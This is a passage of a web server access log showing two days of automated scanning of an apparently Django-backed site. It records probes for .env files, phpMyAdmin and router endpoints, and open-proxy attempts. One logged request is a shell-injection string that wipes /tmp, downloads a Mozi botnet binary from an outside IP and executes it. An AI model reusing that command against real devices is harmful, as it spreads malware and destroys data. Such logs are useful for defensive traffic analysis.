(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 31/34] 178.239.21.164 () {36 vars in 509 bytes} [Mon Jan 31 00:04:00 2022] GET ///admin/config.php => generated 0 bytes in 14 msecs (HTTP/1.1 302) 9 headers in 341 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 3/35] 178.239.21.164 () {36 vars in 544 bytes} [Mon Jan 31 00:04:00 2022] GET /admin/login/?next=/admin/config.php => generated 2234 bytes in 41 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 32/36] 83.97.20.34 () {26 vars in 286 bytes} [Mon Jan 31 00:37:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 33/37] 47.101.192.18 () {34 vars in 459 bytes} [Mon Jan 31 00:37:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 34/38] 4.17.224.134 () {36 vars in 522 bytes} [Mon Jan 31 00:44:14 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 35/39] 4.17.224.134 () {40 vars in 629 bytes} [Mon Jan 31 00:44:14 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 36/40] 111.7.96.148 () {32 vars in 357 bytes} [Mon Jan 31 00:49:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 4/41] 111.7.100.16 () {46 vars in 781 bytes} [Mon Jan 31 00:49:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 37/42] 111.7.100.16 () {46 vars in 803 bytes} [Mon Jan 31 00:49:45 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 38/43] 154.89.5.81 () {30 vars in 326 bytes} [Mon Jan 31 01:43:12 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 162.142.125.222 client_port: 7317] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 39/44] 162.142.125.222 () {24 vars in 267 bytes} [Mon Jan 31 03:05:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 40/45] 162.142.125.222 () {30 vars in 401 bytes} [Mon Jan 31 03:05:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 41/46] 62.171.132.199 () {40 vars in 672 bytes} [Mon Jan 31 03:24:37 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 42/47] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 03:56:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 43/48] 89.248.165.52 () {24 vars in 372 bytes} [Mon Jan 31 04:02:13 2022] CONNECT hotmail-com.olc.protection.outlook.com:25 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 44/49] 64.62.197.2 () {28 vars in 305 bytes} [Mon Jan 31 04:34:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 45/50] 113.53.51.109 () {32 vars in 463 bytes} [Mon Jan 31 04:54:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 46/51] 89.248.165.52 () {24 vars in 300 bytes} [Mon Jan 31 05:02:15 2022] CONNECT 85.206.160.115:80 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 47/52] 123.145.8.166 () {40 vars in 693 bytes} [Mon Jan 31 05:03:39 2022] HEAD http://110.242.68.4/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 48/53] 101.133.224.200 () {32 vars in 504 bytes} [Mon Jan 31 07:03:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 49/54] 27.184.51.96 () {38 vars in 489 bytes} [Mon Jan 31 07:41:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 50/55] 192.241.213.57 () {34 vars in 394 bytes} [Mon Jan 31 08:05:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 51/56] 180.244.136.9 () {32 vars in 463 bytes} [Mon Jan 31 08:18:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 52/57] 136.144.41.117 () {40 vars in 568 bytes} [Mon Jan 31 08:38:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 53/58] 36.106.167.221 () {40 vars in 720 bytes} [Mon Jan 31 08:42:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 54/59] 36.106.167.119 () {40 vars in 687 bytes} [Mon Jan 31 08:42:13 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 55/60] 201.148.166.112 () {32 vars in 466 bytes} [Mon Jan 31 08:45:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 56/61] 173.249.10.27 () {30 vars in 340 bytes} [Mon Jan 31 08:58:19 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 57/62] 173.249.10.27 () {30 vars in 339 bytes} [Mon Jan 31 08:58:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 58/63] 128.1.248.26 () {34 vars in 486 bytes} [Mon Jan 31 10:09:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 59/64] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 10:36:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 60/65] 62.171.132.199 () {40 vars in 672 bytes} [Mon Jan 31 10:49:40 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 61/66] 109.237.103.9 () {36 vars in 523 bytes} [Mon Jan 31 11:27:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 62/67] 103.203.57.10 () {32 vars in 399 bytes} [Mon Jan 31 12:11:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 63/68] 95.181.161.193 () {36 vars in 524 bytes} [Mon Jan 31 12:20:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 64/69] 95.181.161.193 () {40 vars in 631 bytes} [Mon Jan 31 12:20:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 65/70] 83.97.20.34 () {26 vars in 287 bytes} [Mon Jan 31 12:28:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 2/71] 185.180.143.148 () {34 vars in 484 bytes} [Mon Jan 31 13:03:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 66/72] 107.189.28.51 () {28 vars in 310 bytes} [Mon Jan 31 15:40:11 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 67/73] 107.189.28.51 () {40 vars in 671 bytes} [Mon Jan 31 15:40:12 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 5/74] 83.97.20.34 () {30 vars in 329 bytes} [Mon Jan 31 15:42:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 68/75] 46.252.35.8 () {32 vars in 462 bytes} [Mon Jan 31 16:39:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 69/76] 101.132.128.178 () {30 vars in 346 bytes} [Mon Jan 31 17:46:02 2022] GET /pmd/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 70/77] 101.132.128.178 () {30 vars in 360 bytes} [Mon Jan 31 17:46:02 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 71/78] 101.132.128.178 () {30 vars in 360 bytes} [Mon Jan 31 17:46:02 2022] GET /mysqladmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 72/79] 101.132.128.178 () {30 vars in 352 bytes} [Mon Jan 31 17:46:02 2022] GET /sql.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 73/80] 136.144.41.117 () {40 vars in 568 bytes} [Mon Jan 31 17:58:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 74/81] 47.100.127.194 () {34 vars in 604 bytes} [Mon Jan 31 18:19:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 3/82] 47.100.127.194 () {34 vars in 650 bytes} [Mon Jan 31 18:19:12 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 75/83] 47.100.127.194 () {34 vars in 616 bytes} [Mon Jan 31 18:19:12 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 76/84] 47.100.127.194 () {34 vars in 653 bytes} [Mon Jan 31 18:19:12 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 24 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 77/85] 47.100.127.194 () {36 vars in 713 bytes} [Mon Jan 31 18:19:12 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 78/86] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 79/87] 47.100.127.194 () {36 vars in 745 bytes} [Mon Jan 31 18:19:12 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 80/88] 47.100.127.194 () {36 vars in 725 bytes} [Mon Jan 31 18:19:12 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 81/89] 47.100.127.194 () {36 vars in 743 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 6/90] 47.100.127.194 () {36 vars in 783 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 7/91] 47.100.127.194 () {36 vars in 753 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 8/92] 47.100.127.194 () {36 vars in 749 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 4/93] 47.100.127.194 () {36 vars in 761 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 5/94] 47.100.127.194 () {36 vars in 781 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 6/95] 47.100.127.194 () {36 vars in 745 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 1/96] 47.100.127.194 () {36 vars in 749 bytes} [Mon Jan 31 18:19:12 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 82/97] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 83/98] 47.100.127.194 () {36 vars in 715 bytes} [Mon Jan 31 18:19:12 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 84/99] 47.100.127.194 () {36 vars in 699 bytes} [Mon Jan 31 18:19:12 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 85/100] 83.97.20.34 () {26 vars in 287 bytes} [Mon Jan 31 18:24:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 86/101] 39.103.165.234 () {22 vars in 235 bytes} [Mon Jan 31 19:17:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 87/102] 39.103.165.234 () {22 vars in 297 bytes} [Mon Jan 31 19:17:56 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 88/103] 39.103.165.234 () {22 vars in 238 bytes} [Mon Jan 31 19:18:01 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 89/104] 39.103.165.234 () {22 vars in 239 bytes} [Mon Jan 31 19:18:04 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 90/105] 39.103.165.234 () {40 vars in 485 bytes} [Mon Jan 31 19:18:07 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 91/106] 119.108.65.35 () {34 vars in 648 bytes} [Mon Jan 31 19:22:51 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.108.65.35:55172/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 92/107] 183.136.225.14 () {30 vars in 414 bytes} [Mon Jan 31 19:24:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 93/108] 183.136.225.14 () {32 vars in 475 bytes} [Mon Jan 31 19:25:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 94/109] 183.136.225.14 () {32 vars in 497 bytes} [Mon Jan 31 19:25:18 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 95/110] 183.136.225.14 () {32 vars in 495 bytes} [Mon Jan 31 19:25:18 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 96/111] 183.136.225.14 () {34 vars in 459 bytes} [Mon Jan 31 19:29:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 97/112] 183.136.225.14 () {36 vars in 520 bytes} [Mon Jan 31 19:29:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 98/113] 183.136.225.14 () {36 vars in 542 bytes} [Mon Jan 31 19:29:38 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 99/114] 183.136.225.14 () {36 vars in 540 bytes} [Mon Jan 31 19:29:38 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 100/115] 47.101.45.59 () {34 vars in 425 bytes} [Mon Jan 31 19:35:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 101/116] 23.90.160.114 () {30 vars in 446 bytes} [Mon Jan 31 20:03:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 102/117] 209.17.96.234 () {30 vars in 410 bytes} [Mon Jan 31 20:07:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 103/118] 167.248.133.47 () {28 vars in 311 bytes} [Mon Jan 31 20:29:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 104/119] 167.248.133.47 () {34 vars in 443 bytes} [Mon Jan 31 20:29:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 105/120] 62.171.132.199 () {40 vars in 672 bytes} [Mon Jan 31 21:30:26 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 106/121] 109.237.103.38 () {36 vars in 524 bytes} [Mon Jan 31 21:46:16 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 107/122] 20.55.53.144 () {34 vars in 495 bytes} [Mon Jan 31 21:52:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 108/123] 109.237.103.123 () {36 vars in 525 bytes} [Mon Jan 31 22:09:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 109/124] 83.97.20.34 () {30 vars in 328 bytes} [Mon Jan 31 22:32:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 110/125] 183.136.225.9 () {34 vars in 458 bytes} [Mon Jan 31 22:52:29 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 111/126] 193.118.53.202 () {34 vars in 488 bytes} [Mon Jan 31 23:10:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 112/127] 39.105.202.207 () {30 vars in 360 bytes} [Mon Jan 31 23:24:02 2022] HEAD /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 9/128] 39.105.202.207 () {30 vars in 346 bytes} [Mon Jan 31 23:24:02 2022] HEAD /pmd/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 113/129] 39.105.202.207 () {28 vars in 323 bytes} [Mon Jan 31 23:24:02 2022] HEAD /sql.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 114/130] 39.105.202.207 () {28 vars in 331 bytes} [Mon Jan 31 23:24:02 2022] HEAD /mysqladmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 115/131] 213.109.128.72 () {32 vars in 471 bytes} [Mon Jan 31 23:46:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 116/132] 83.97.20.34 () {26 vars in 287 bytes} [Tue Feb 1 00:50:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 117/133] 75.91.230.28 () {28 vars in 306 bytes} [Tue Feb 1 02:30:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 118/134] 39.98.234.140 () {30 vars in 358 bytes} [Tue Feb 1 02:36:25 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 119/135] 39.98.234.140 () {30 vars in 344 bytes} [Tue Feb 1 02:36:25 2022] GET /pmd/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 120/136] 39.98.234.140 () {28 vars in 329 bytes} [Tue Feb 1 02:36:25 2022] GET /mysqladmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 121/137] 39.98.234.140 () {28 vars in 339 bytes} [Tue Feb 1 02:36:26 2022] GET /phpMyAdmin4.8.5/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 122/138] 103.237.101.15 () {34 vars in 524 bytes} [Tue Feb 1 02:41:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 123/139] 124.227.31.238 () {32 vars in 478 bytes} [Tue Feb 1 02:41:56 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 124/140] 124.227.31.238 () {32 vars in 487 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 125/141] 124.227.31.238 () {32 vars in 478 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 126/142] 124.227.31.238 () {32 vars in 472 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.boxun.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 127/143] 124.227.31.238 () {22 vars in 275 bytes} [Tue Feb 1 02:41:56 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 0 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 128/144] 124.227.31.238 () {32 vars in 469 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.bing.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 129/145] 124.227.31.238 () {32 vars in 472 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.baidu.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 7/146] 124.227.31.238 () {32 vars in 475 bytes} [Tue Feb 1 02:41:56 2022] GET http://www.123cha.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 8/147] 124.227.31.238 () {32 vars in 465 bytes} [Tue Feb 1 02:42:02 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 10/148] 13.52.78.222 () {34 vars in 502 bytes} [Tue Feb 1 02:42:35 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 130/149] 165.227.113.211 () {36 vars in 483 bytes} [Tue Feb 1 03:34:04 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 11/150] 106.14.217.247 () {34 vars in 460 bytes} [Tue Feb 1 04:06:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 131/151] 109.237.103.118 () {36 vars in 525 bytes} [Tue Feb 1 04:20:07 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 132/152] 136.144.41.117 () {40 vars in 568 bytes} [Tue Feb 1 04:52:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 133/153] 192.241.212.153 () {34 vars in 423 bytes} [Tue Feb 1 04:56:58 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 134/154] 164.90.197.2 () {32 vars in 438 bytes} [Tue Feb 1 04:57:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 135/155] 83.97.20.34 () {30 vars in 328 bytes} [Tue Feb 1 05:03:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 12/156] 39.103.165.99 () {32 vars in 502 bytes} [Tue Feb 1 05:40:39 2022] GET / => generated 